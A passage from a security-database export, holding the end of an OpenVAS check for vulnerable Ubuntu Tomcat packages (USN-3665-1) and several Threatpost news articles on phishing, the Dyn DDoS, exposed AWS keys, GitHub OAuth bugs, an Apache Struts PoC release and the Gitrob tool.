script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for tomcat8 USN-3665-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Tomcat incorrectly\nhandled being configured with HTTP PUTs enabled. A remote attacker could use\nthis issue to upload a JSP file to the server and execute arbitrary code. This\nissue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 17.10.\n(CVE-2017-12616, CVE-2017-12617)\n\nIt was discovered that Tomcat contained incorrect documentation regarding\ndescription of the search algorithm used by the CGI Servlet to identify\nwhich script to execute. This issue only affected Ubuntu 17.10.\n(CVE-2017-15706)\n\nIt was discovered that Tomcat incorrectly handled en empty string URL\npattern in security constraint definitions. A remote attacker could\npossibly use this issue to gain access to web application resources,\ncontrary to expectations. This issue only affected Ubuntu 14.04 LTS,\nUbuntu 16.04 LTS and Ubuntu 17.10. (CVE-2018-1304)\n\nIt was discovered that Tomcat incorrectly handled applying certain security\nconstraints. A remote attacker could possibly access certain resources,\ncontrary to expectations. This issue only affected Ubuntu 14.04 LTS,\nUbuntu 16.04 LTS and Ubuntu 17.10. (CVE-2018-1305)\n\nIt was discovered that the Tomcat CORS filter default settings were\ninsecure and would enable 'supportsCredentials' for all origins, contrary\nto expectations. (CVE-2018-8014)\");\n script_tag(name:\"affected\", value:\"tomcat8 on Ubuntu 18.04 LTS,\n Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3665-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3665-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|18\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.52-1ubuntu0.14\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.52-1ubuntu0.14\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.21-1ubuntu1.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.21-1ubuntu1.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.30-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.30-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.32-1ubuntu1.6\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.32-1ubuntu1.6\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:25", "description": "Days after news broke last week that advanced, persistent threat actors penetrated nuclear facilities, researchers are explaining techniques used by adversaries to gain toeholds in similar targets in energy. Cisco Talos reported Friday that email-based attacks, leveraging template injection techniques, targeting nuclear facilities and others have been ongoing since May.\n\n\u201cTalos has observed attackers targeting critical infrastructure and energy companies around the world, primarily in Europe and the United States. These attacks target both the critical infrastructure providers, and the vendors those providers used to deliver critical services,\u201d [researchers wrote on Friday](<http://blog.talosintelligence.com/2017/07/template-injection.html#more>).\n\nAdversaries are leveraging classic Word document-based phishing attacks, they said. However, the Word document attachments used in the phishing campaigns do not contain malicious VBA macros or embedded scripting. Instead, attachments attempt to download a malicious template file over a Server Message Block (SMB) connection so that the user\u2019s credentials can be harvested, researchers said.\n\nCisco Talos did not claim this specific attack was used against Wolf Creek Nuclear Operating Corporation or in connection with any specific attack cited in a joint report issued by the Department of Homeland Security and the Federal Bureau of Investigation last week. Neither did researchers claim attacks had ever led to a hacker breaching or disrupting the core systems controlling operations at an energy plant.\n\n\u201cOne objective of this most recent attack appears to be to harvest credentials of users who work within critical infrastructure and manufacturing industries,\u201d Talos wrote.\n\nTargeted phishing attacks included DOCX type documents delivered as attachments under the guise of being an environmental report or a resume. While no malicious macros or scripting is embedded in the document, when a user opens it, a request is made via the SMB protocol for a template, as such \u201cContacting:\\\\\\ . . . \\Template.dotm.\u201d\n\n\u201cThe document was trying to pull down a template file from a particular IP,\u201d they noted. That connection was not via TCP 80 (often used for C2 communications), rather the SMB request was via TCP 445, a traditional Microsoft networking port.\n\nWithin the sandboxed VM \u201ca WebDAV connection was attempted over a SMB session when requesting the template.\u201d\n\nWebDAV is a Web-based Distributed Authoring and Versioning extension to the HTTP protocol that allows users to collaboratively edit and manage files on a remote server, according to [WebDAV Working Group](<http://www.webdav.org/>).\n\nUsing the WebDAV connection, the DOCX file requests a specific Relationship ID that is present in word/_rels/settings.xml.rels, or the XML instructions. According to researchers, the Relationship ID is identical to a phishing tool named Phishery, which uses the exact same ID in its template injection.\n\nPhishery is known as a credential harvester with a Word document template URL injector. According the [GitHub tool description](<https://github.com/ryhanson/phishery>), \u201cPhishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication.\u201d Once the target opens the Word document attachment sent in the phishing email, the template request reaches out to a Phishery server that triggers a dialogue box on the victim\u2019s computer requesting a Windows username and password.\n\nTalos researchers said Phishery was not used in the attacks it observed. It theorizes attacks may have used modified Phishery code or used the same Relationship ID to thwart analysis.\n\nIn the sample Talos examined, unlike with Phishery that prompted users for credentials, instead a template file is requested from a third-party server with no Basic Authentication prompt for credentials. \u201cSuch a prompt was not needed nor seen for samples requesting the template over SMB,\u201d they wrote.\n\nOnce the target opens the Word document a template request is made to a third-party server that initiates the download of a potentially rogue template. \u201cThe attachment instead tries to download a template file over an SMB connection so that the user\u2019s credentials can be silently harvested. In addition, this template file could also potentially be used to download other malicious payloads to the victim\u2019s computer,\u201d researchers said.\n\nTalos explains that the attacker\u2019s SMB server was down when it analyzed samples, making it impossible to determine the payloads (if any) that could have been dropped by the template being downloaded. \u201cForcing SMB requests to an external server has been a known security vulnerability for many years. Without further information it is impossible to conclude what the true scope of this attack was or what malicious payloads could have been involved.\u201d\n\nAccording to a _[New York Times](<https://www.nytimes.com/2017/07/06/technology/nuclear-plant-hack-report.html>)_ report of attacks against Wolf Creek Nuclear Operating Corporation included phishing lures with highly targeted email messages containing fake resumes for control engineering jobs.\n\nLate last month, the U.S. government warned critical infrastructure companies of hacking campaigns against nuclear and energy sector. \u201cHistorically, cyber actors have strategically targeted the energy sector with various goals ranging from cyber espionage to the ability to disrupt energy systems in the event of a hostile conflict,\u201d the report said.\n", "cvss3": {}, "published": "2017-07-10T14:34:03", "type": "threatpost", "title": "Energy, Nuclear Targeted with Template Injection Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-07-10T18:34:03", "id": "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "href": "https://threatpost.com/energy-nuclear-targeted-with-template-injection-attacks/126727/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:34", "description": "**Update **DNS provider Dyn has confirmed two massive distributed denial of service attacks against its servers Friday impacting many of its customers including Twitter, Spotify and GitHub. The attacks came in two waves, one early Friday morning and a second just a few hours later.\n\n\u201cThis attack is mainly impacting U.S. East and is impacting Managed DNS customers in this region. Our engineers are continuing to work on mitigating this issue,\u201d according to a [statement by the company to customers](<https://www.dynstatus.com/>).\n\nAs of 5:30 p.m. EDT Dyn was still reporting it was investigating and mitigating several DDoS attacks against its domain name servers.\n\nIt\u2019s unclear how many sites have been impacted. For hours Friday morning many popular sites appeared to be experiencing outages or extremely sluggish performance including Twitter, Etsy, Github, SoundCloud, Spotify, Heroku, PagerDuty and Shopify. Dyn representatives would not confirm if each one of these outages was tied to the DDoS attack.\n\nBoth the Department of Homeland Security and the Federal Bureau of Investigation said they were monitoring the attacks. Gillian Christensen, acting deputy press secretary for DHS said in a statement: \u201cDHS and FBI are aware and are investigating all potential causes.\u201d\n\nManchester, New Hampshire-based Dyn said it first began monitoring the DDoS attack at 7:10 a.m. EDT Friday. The company said in a statement to customers:\n\n> \u201cStarting at 11:10 UTC on October 21th-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.\u201d\n\nDyn said at 9:36 a.m. EDT, its services were restored and many of its affected customers, including Twitter, were back online. However, at 11:52 a.m. (EDT) Dyn updated its network status reporting an additional attack impacting its managed DNS infrastructure. Then 40 minutes later Dyn added the attacks had spread to its \u201cmanaged DNS advanced services with possible delays in monitoring.\u201d\n\nIt\u2019s unclear, at this time, the source of the DDoS attack, Dyn said.\n\nDale Drew, chief security officer for telecommunications firm Level 3 Communications said he had been monitoring the attack and the likely source were overseas hackers targeting U.S. cyber infrastructure. He added, [via a video statement posted to Periscope](<https://www.periscope.tv/w/1lPJqYjVMlZJb>), \u201cWe are seeing attacks coming from an Internet of Things botnet we have identified as Marai.\u201d\n\nSecurity firm Flashpoint also identified Marai as the likely culprit in the attack.\n\nThe Mirai malware continues to recruit vulnerable IoT devices into botnets [at a record pace](<https://threatpost.com/mirai-bots-more-than-double-since-source-code-release/121368/>), one that\u2019s only gone up since the source code for Mirai was made [public two weeks ago](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>), according to Level 3.\n\nCraig Young, principle security researcher at Tripwire said the attack has telltale signs of an IoT-based DDoS attack similar to ones experienced by [Krebs on Security](<https://threatpost.com/iot-botnets-are-the-new-normal-of-ddos-attacks/121093/>) in September. In those attacks, hackers also used Mirai malware to compromise IoT devices to launch DDoS attacks.\n\n\u201cWe are seeing an increase in the number of high-intensity attacks that leverage compromised consumer DVRs and cameras. Without being able to analyze the source of Dyn\u2019s traffic it\u2019s impossible to know for sure. But what we are already seeing today, in terms IoT-based attacks, is the tip of the iceberg,\u201d Young said.\n\nRequests to Dyn for information on the source of the attacks have not been returned.\n\nYoung said that security experts have seen an increase in DDoS extortion attempts. However, he points out, many have been hoaxes and when companies didn\u2019t pay up nothing happened.\n\nForeScout CEO, Michael DeCesare said that attacks, such as the ones carried out Friday, are exasperated by the lack of security in IoT devices.\n\n\u201cThese attackers can now recruit an army of IoT devices to launch a wide scale DDoS attack due to the volume of these devices and their ease of infiltration,\u201d DeCesare said in a prepared statement regarding Friday\u2019s attacks.\n\n\u201cThe question corporations should be asking themselves is whether or not their devices are being exploited as part of these attacks. The solution starts with visibility \u2013 you cannot secure what you cannot see,\u201d he said.\n\n[![Level3 live outage map on Friday 9:50 AM \$ET\$](https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232928/Threatpost_Level3_outage_map.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232928/Threatpost_Level3_outage_map.jpg>)\n\nLevel3 live outage map on Friday 9:50 AM (EDT)\n\n[![screen-shot-2016-10-21-at-5-18-29-pm](https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232859/Screen-Shot-2016-10-21-at-5.18.29-PM-1024x605.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232859/Screen-Shot-2016-10-21-at-5.18.29-PM.png>)\n\nLevel3 live outage map on Friday 5:20 PM (EDT)\n\n_This article was updated Oct. 21 at 5:30 p.m. with new information from the Department of Homeland Security, new information tying the attacks to Mirai malware and quotes from both Level 3 Communications and ForeScout. \n_\n", "cvss3": {}, "published": "2016-10-21T10:01:14", "type": "threatpost", "title": "DYN Confirms DDoS Attack Knocking Out Twitter, Spotify Other Major Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-10-21T21:37:20", "id": "THREATPOST:0FC293825070B81036932BDB41D793B5", "href": "https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:06", "description": "Amazon Web Services is actively searching a number of sources, including code repositories and application stores, looking for exposed credentials that could put users\u2019 accounts and services at risk.\n\nA week ago, a security consultant in Australia said that as many as 10,000 secret Amazon Web Services keys could be found on Github through a simple search. And yesterday, a software developer reported receiving a notice from Amazon that his credentials were discovered on Google Play in an Android application he had built.\n\nRaj Bala printed a [copy of the notice](<http://blog.rajbala.com/post/81038397871/amazon-is-downloading-apps-from-google-play-and>) he received from Amazon pointing out that the app was not built in line with Amazon\u2019s recommended best practices because he had embedded his AWS Key ID (AKID) and AWS Secret Key in the app.\n\n\u201cThis exposure of your AWS credentials within a publicly available Android application could lead to unauthorized use of AWS services, associated excessive charges for your AWS account, and potentially unauthorized access to your data or the data of your application\u2019s users,\u201d Amazon told Baj.\n\nAmazon advises users who have inadvertently exposed their credentials to invalidate them and never distribute long-term AWS keys with an app. Instead, Amazon recommends requesting temporary security credentials.\n\nRich Mogull, founder of consultancy Securosis, said this is a big deal.\n\n\u201cAmazon is being proactive and scanning common sources of account credentials, and then notifying customers,\u201d Mogull said. \u201cThey don\u2019t have to do this, especially since it potentially reduces their income.\u201d\n\nMogull knows of what he speaks. Not long ago, he received a similar notice from Amazon regarding his AWS account, only his warning was a bit more dire\u2014his credentials had been exposed on Gitbub and someone had fired up unauthorized EC2 instances in his account.\n\nMogull wrote an [extensive description of the incident](<https://securosis.com/blog/my-500-cloud-security-screwup>) on the Securosis blog explaining how he was building a proof-of-concept for a conference presentation, storing it on Github, and was done in because a test file he was using against blocks of code contained his Access Key and Secret Key in a comment line.\n\nTurns out someone was using the additional 10 EC2 instances to do some Bitcoin mining and the incident cost Mogull $500 in accumulated charges.\n\nAmazon told an Australian publication that it will continue its efforts to seek out these exposed credentials on third-party sites such as Google Play and Github.\n\n\u201cTo help protect our customers, we operate continuous fraud monitoring processes and alert customers if we find unusual activity,\u201d _[iTnews](<http://www.itnews.com.au/News/381432,aws-admits-scanning-android-app-in-secret-key-hunt.aspx>) _quoted Amazon.\n\nSaid Mogull: \u201cIt isn\u2019t often we see a service provider protecting their customers from error by extending security beyond the provider\u2019s service itself. Very cool.\u201d\n", "cvss3": {}, "published": "2014-04-02T15:01:53", "type": "threatpost", "title": "Amazon Web Services Combing Third Parties for Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-04-04T19:14:11", "id": "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "href": "https://threatpost.com/amazon-web-services-combing-third-parties-for-exposed-credentials/105217/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:10", "description": "Mike Mimoso and Chris Brook discuss the news of the week, including a password issue at Github, the xDedic marketplace, another Flash zero day, and how the poorly the FBI is doing with facial recognition software.\n\nDownload: [Threatpost_News_Wrap_June_17_2016.mp3](<http://traffic.libsyn.com/digitalunderground/Threatpost_News_Wrap_June_17_2016.mp3>)\n\nMusic by Chris Gonsalves\n\n[![itunessub](https://media.threatpost.com/wp-content/uploads/sites/103/2014/11/07011443/itunessub.jpg)](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2016-06-17T11:15:12", "type": "threatpost", "title": "On xDedic, a Flash Zero Day, Facial Recognition, and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:31", "id": "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "href": "https://threatpost.com/threatpost-news-wrap-june-17-2016/118745/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:23", "description": "A Russian security researcher was able to take five low severity OAuth bugs in the coding site Github and string them together to create what he calls a \u201csimple but high severity exploit\u201d that gave him unfettered access to users\u2019 private repositories.\n\nBangkok-based researcher Egor Homakov \u2013 inspired to poke around the site after learning about its [new bug bounty program last month](<http://threatpost.com/github-launches-bug-bounty-program/103974>) \u2013 discussed the bugs in a blog entry [on his site](<http://homakov.blogspot.com/2014/02/how-i-hacked-github-again.html?m=1>) on Friday.\n\nGithub went on to fix the vulnerabilities \u201cin a timely fashion\u201d according to Homakov, who said he received a $4,000 reward, the highest Github has rewarded in the bounty program\u2019s short time, for his work.\n\nThe main problem lies in the site\u2019s Gist OAuth functionality. [Gists](<https://gist.github.com/>) are Pastebin-like repositories on Github that allow coders to share bits and pieces of their work with their contemporaries, and OAuth is an authentication protocol that can allow different entities, be it a web app or a mobile app, varying degrees of access to your account.\n\nThe first vulnerability in Github Homakov noticed was that he could bypass its [redirect_uri](<https://developer.github.com/v3/oauth/#redirect-urls>) validation by imputing a /../ path traversal. A path traversal attack allows access files and directories stored outside the web root folder to be accessed by manipulating the URL. In this case when the browser is redirected, Homakov found that he can control the HTTP parameter and trick it into not fully parsing the URL, letting him redirect to any Gist page he wants.\n\nIn fact Homakov found that whatever the client sent to get an authorization token, the provider would respond with a valid access_token, a vulnerability that could be used to compromise the log-in functionality on any site that uses it.\n\nThis \u2013 the second bug \u2013 could make it easy for an attacker to hijack the authorization code used for the redirect_uri and simply apply the leaked code on real client\u2019s callback to log in under the victim\u2019s account.\n\nHomakov discovered he could leverage both bugs to trick a user into following a link to get Github to leak a code sending request to him. Using something he\u2019s nicknamed an [Evolution of Open Redirect vulnerability](<http://homakov.blogspot.com/2014/01/evolution-of-open-redirect-vulnerability.html>) the code sending request is sent to an image request which Homakov can then use to then log into the victim\u2019s account and secure access to private gists.\n\nGists are static pages and can even allow users to embed their own images, or at least image code. In this situation there\u2019s a certain way the code can point to a suspicious URL and acquire the victim\u2019s code.\n\nOnce in, Homakov found that the client reveals the victim\u2019s actual OAuth access_token to the user agent, something he then was able to take advantage of and use to perform API calls on behalf of the victim.\n\nSince Gist falls under the Github umbrella, Homakov found the client approves any scope it\u2019s asked automatically. That includes allowing it to carry out specially crafted URLs that can leak code, giving him access to private GitHub repositories and Gists, \u201call in stealth-mode,\u201d because the github_token belongs to the Gist client. From here Homakov has the control of the affected Github user and their Gist account.\n\nHomakov is no stranger to rooting out Github bugs; he blogged about a bug involving the way the site pushes [public keys](<http://homakov.blogspot.com/2012/03/how-to.html>) in March 2012 and a problem with the way the site [handles cookies](<http://homakov.blogspot.com/2013/03/hacking-github-with-webkit.html>) last March.\n\nGithub kicked off its bug bounty program just over a week ago by promising to award anywhere from $100 to $5,000 to researchers who discover vulnerabilities in the site or other applications like its API or Gist. As Homakov\u2019s vulnerability involved both Github and Gist and fetched $4,000, it was clearly of concern to the site, with the way the vulnerabilities \u201c[fit so nicely together](<https://twitter.com/homakov/status/431685133570031617>),\u201d impressing Github.\n", "cvss3": {}, "published": "2014-02-11T10:53:58", "type": "threatpost", "title": "Five OAuth Bugs Lead to Github Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-02-13T22:01:16", "id": "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "href": "https://threatpost.com/five-oauth-bugs-lead-to-github-hack/104178/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-30T05:51:35", "description": "Proof-of-concept code found on the GitHub repository could allow attackers to easily take advantage of a recently identified vulnerability in the Apache Struts 2 framework. The vulnerability ([CVE-2018-11776](<https://access.redhat.com/security/cve/cve-2018-11776>)), [identified earlier this week](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>), could allow an adversary to execute remote code on targeted systems.\n\nOn Friday, proof-of-concept code was [released](<https://github.com/jas502n/St2-057>) on GitHub along with a [Python script](<https://github.com/pr4jwal/quick-scripts/blob/master/s2-057.py>) that allows for easy exploitation, according to Allan Liska, senior security architect with Recorded Future.\n\n\u201c[We have] also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability,\u201d he [wrote in a post](<https://www.recordedfuture.com/apache-struts-vulnerability-github/>).\n\nThe bug, which impacts Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16, is tied to an improper validation of input data. The Apache Software Foundation [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) the vulnerability for all supported versions of Struts 2. Users of Struts 2.3 are advised to upgrade to 2.3.35 and users of Struts 2.5 need to upgrade to 2.5.17.\n\nLiska said the Apache Struts 2 vulnerability is potentially even more damaging than a similar [2017 Apache Struts bug used to exploit Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\n\u201cUnlike that vulnerability, this one does not require any plug-ins to be present in order to exploit it, a simple well-crafted URL is enough to give an attacker access to a victim\u2019s Apache Struts installation and there is already exploit code on Github and underground forums are talking about how to exploit it. The worst part for many large organizations is that they may not even know they are vulnerable because Struts underpins a number of different systems including Oracle and Palo Alto,\u201d Liska said.\n\nThe fact that a patch is available to fix the vulnerability should give cold comfort to companies potentially impacted by the flaw.\n\n\u201cThe Equifax breach happened not because the vulnerability wasn\u2019t fixed, but because Equifax hadn\u2019t yet updated Struts to the latest version. If this is a true working PoC, then any company who hasn\u2019t had the time to update their software, will now be at even greater risk,\u201d said Oege de Moor, chief executive officer at Semmle.\n\nDe Moor said Semmle is not confirming whether the reported PoC is functional.\n\n\u201cIf it is [functioning], attackers now have a quicker way into the enterprise,\u201d de Moor wrote in a prepared statement Friday. \u201cThere is always a time lag between the announcement of a patch and a company updating its software. There are many reasons why companies can\u2019t update software like Struts immediately, as it is used for many business-critical operations. We aim to give companies a chance to stay safe by working with Apache Struts to make a coordinated disclosure.\u201d\n", "cvss3": {}, "published": "2018-08-24T22:07:17", "type": "threatpost", "title": "PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T22:07:17", "id": "THREATPOST:2F30C320035805DB537579B86877517E", "href": "https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:55:11", "description": "Github is forcing a password reset on some of its users after it detected a number of successful intrusions into its repositories using credentials compromised in other breaches.\n\n\u201cThis appears to be the result of an attacker using lists of email addresses and passwords from other online services that have been compromised in the past, and trying them on GitHub accounts,\u201d GitHub said in an [advisory](<https://github.com/blog/2190-github-security-update-reused-password-attack>) published Thursday by Shawn Davenport, GitHub VP of security. \u201cWe immediately began investigating, and found that the attacker had been able to log in to a number of GitHub accounts.\u201d\n\nGitHub said it detected late Tuesday unauthorized attempts against a large number of GitHub accounts. It stressed that GitHub itself has not been compromised.\n\nIt warns users that in addition to the exposed credentials, some personal information may have been exposed as well as lists of accessible repositories and organizations.\n\n\u201cIf your account was impacted, we are in the process of contacting you directly with information about how to reset your password and restore access to your account,\u201d GitHub said.\n\nThe source of credentials used to attack GitHub accounts is unknown. ~~A request for comment from GitHub was not returned in time for publication~~ Github declined to comment beyond what is in its advisory.\n\nIn recent weeks, a number of massive online services including Twitter, VerticalScope, LinkedIn, Tumblr, VK.com and others have been informed that login credentials are for sale in bulk on the black market.\n\nAggregator site LeakedSource has been selling access to its database of breached credentials and more than 700 million credentials have been shared with the site.\n\n\u201cOur intentions are to bring data breaches to light no matter how old, inform consumers about what data is out there, inform consumers to use unique passwords and through our business API directly help companies determine if their users are at risk for account hijacking,\u201d LeakedSource told Threatpost.\n\n[VerticalScope](<http://www.verticalscope.com/about-us/security-update.html>), whose technology powers a number of popular online forums, is the most recent victim to come to light. More than 40 million credentials are believe to be implicated, stolen from sites running outdate vBulletin software that fails to implement HTTPS.\n\n\u201cWe believe that any potential breach is limited to usernames, userids, email addresses, ip addresses and encrypted passwords of our community users,\u201d VerticalScope said in its advisory.\n\nThe VerticalScope data was shared with LeakedSource, which analyzed it and said most of the passwords were salted using the outdated MD5 algorithm and easily crackable. LeakedSource published a top 10 list of the most common passwords and an unusual number of jibberish, complex passwords were included (18atcskd2w was used more on more than 91,000 accounts) indicating that they were likely generated by a bot and used to access the various forums.\n\nIn addition to VerticalScope, LeakedSource has analyzed tens of millions of credentials belonging to Twitter, iMesh and users of other large services whose credentials were stolen at some point.\n\nExperts, meanwhile, continue to caution against [password reuse](<https://threatpost.com/no-simple-fix-for-password-reuse/118536/>). As these breaches show, using the same password to access multiple sites is becoming fodder for attackers compromising one site to use that same access at other locations on the Internet.\n\n\u201cWe know that attackers will go for the weakest link and that is any user who reuses their passwords. It\u2019s a major problem,\u201d said Christopher Hadnagy, chief human hacker at security firm Social-Engineer.\n", "cvss3": {}, "published": "2016-06-17T11:01:55", "type": "threatpost", "title": "Breached Credentials Used to Access Github Repositories", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:36", "id": "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "href": "https://threatpost.com/breached-credentials-used-to-access-github-repositories/118746/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:34", "description": "Free online code repositories such as GitHub provide a valuable collaboration service for enterprise developers. But it\u2019s also a trove of potentially sensitive company and project information that\u2019s likely to warrant attention from hackers.\n\nAn application security specialist from Berlin has developed a tool he hopes can keep companies a step ahead. [Gitrob](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>) is an open source intelligence command-line tool that mines GitHub for files belonging to an organization and runs them against pre-determined patterns looking for potentially sensitive information that isn\u2019t meant for public consumption.\n\nIts developer Michael Henriksen, who does application security and code auditing for SoundCloud, says Gitrob starts off by using GitHub\u2019s public API to query a Github organization\u2019s list of public members.\n\n\u201cWhen the list of members is obtained, it queries GitHub again for each member that returns a list of their public repositories,\u201d Henriksen told Threatopst. \u201cThe contents of the repositories are never downloaded to the machine, it simply uses GitHub\u2019s API again to obtain a list of file names. When clicking on a file in the web interface to see its contents, it is fetched from GitHub\u2019s servers.\u201d\n\nHenriksen said he has built a number of Observers, which act as Gitrob plug-ins, that flag files matching certain patterns. Organization members, repositories and files are saved to a PostgreSQL database for analysis before a Sinatra webserver is started locally in order to serve a web app that presents the data for analysis, which must be conducted manually.\n\n\u201cAll the files are sent through these observers, one by one, and the observers can then decorate or make changes to the file\u2019s database record, before it is saved to the database,\u201d Henriksen said. \u201cRight now, Gitrob actually only contains one observer which will flag files that match [patterns of interesting files](<https://github.com/michenriksen/gitrob/blob/master/patterns.json>), but the design makes it easy to introduce new logic to look for other things. The patterns are built in to the tool itself.\u201d\n\nSecurity analysts inside an enterprise should feel at home using Gitrob, Henriksen said, but cautioned that the tool will point out a default set of potentially sensitive items. An analyst would have to manually comb through them to determine whether those files should be public.\n\n> OSINT #Gitrob mines GitHub for sensitive information that isn\u2019t meant for public consumption.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgitrob-combs-github-repositories-for-secret-company-data%2F110380%2F&text=OSINT+%23Gitrob+mines+GitHub+for+sensitive+information+that+isn%26%238217%3Bt+meant+for+public+consumption.>)\n\n\u201cA security team in an organization can use Gitrob to periodically scan their repositories for sensitive files that might be checked in,\u201d Henriksen said. \u201cThe current version is not really suitable to run in an automated fashion, so it would have to be run manually, but I am planning to change that in the future so that it can be run automatically and report to somewhere when new things are found.\u201d\n\nHenriksen said he tested Gitrob against a number of GitHub repositories belonging to companies of different sizes; he found a variety of information using Gitrob from username-password combinations, email addresses, internal system mappings and other information that could be used in phishing campaigns or other social engineering attacks. Henriksen said he notified affected organizations; most were appreciative he said.\n\n\u201cI am not aware of any tool that specifically targets GitHub organizations like Gitrob does,\u201d Henriksen said. \u201cPeople have been finding sensitive files with GitHub\u2019s search functionality for a while (kind of like Google dorks for Github), but I think Gitrob is the first tool that makes the task of finding sensitive files within an organization very easy.\u201d\n\nInstallation instructions and requirements can be found on [his Github page](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>).\n\n[_Image courtesy 